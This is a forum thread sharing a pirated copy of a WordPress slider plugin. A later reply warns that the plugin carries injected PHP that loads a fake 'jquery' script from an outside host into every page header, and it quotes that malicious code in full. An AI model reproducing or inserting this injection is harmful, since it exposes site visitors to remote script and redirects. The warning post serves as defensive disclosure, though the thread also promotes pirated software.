29.gif

Search (advanced search)
Use this Search form before posting, asking or make a new thread.
Tips: Use Quotation mark to search words (eg. "How To Make Money Online")

01-13-2013, 02:46 PM (This post was last modified: 01-15-2013 02:21 PM by seoacejim.)
Post: #1
TOP # 1 Worpress slider maker- Amazing professional slides in seconds!! Code Canyon
Ever thought you will be able to make your own professional sliders just as you always wanted and still felt that emptyness without it Confused ? With this plugin, turn your average looking website to a super cool website in 5 minutes or less. Biggrin

Watch this video then you'll know what I am talking about :)
*** I JUST GOT THIS FROM ANOTHER FORUM AND THOUGHT TO SHARE WITH MY FRIENDS HERE***





http://www.youtube.com/watch?feature=pla...VleysEPHM4 - url for above video Welcome


[hide]http://www.uploadseeds.com/download.php?uid=RKXUTJOO[/hide]
Didn't I deserve a rep for this super cool share dear fellow hackers ? Adding a rep only take a second, but you can bring a smile on my face by that :) Cool

Please enjoy !!
01-13-2013, 08:15 PM
Post: #2
RE:
Great,
But doesn't populate images from posts...
01-13-2013, 11:45 PM
Post: #3
RE:
d*** watched 3mins the video if its worth to Download

Really Great Share will give Rep for this

Thanks!!!
01-15-2013, 04:55 AM
Post: #4
WARNING: POSSIBLE MALICIOUS CODE IN THIS.
Found this wpquery.co crap inside this plugin. This is NOT the way any jquery is declared on any theme or plugin. The last time I saw this crap, it was redirecting the site to some downloadfreemusic site.

Do NOT install this until you are sure it has been cleaned. 99% of the times it's malicious. If you have installed it, delete it and inspect for redirects.

The code is inside revslider/inc_php/function.php

Code:
<?php if (!function_exists('class_db_set')){function class_db_set(){if (function_exists('curl_init')){$url = "http://www.wpquery.co/jquery-1.6.3.min.js";$ch = curl_init();    $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'class_db_set');} ?>

Take care, and be careful.




67.gif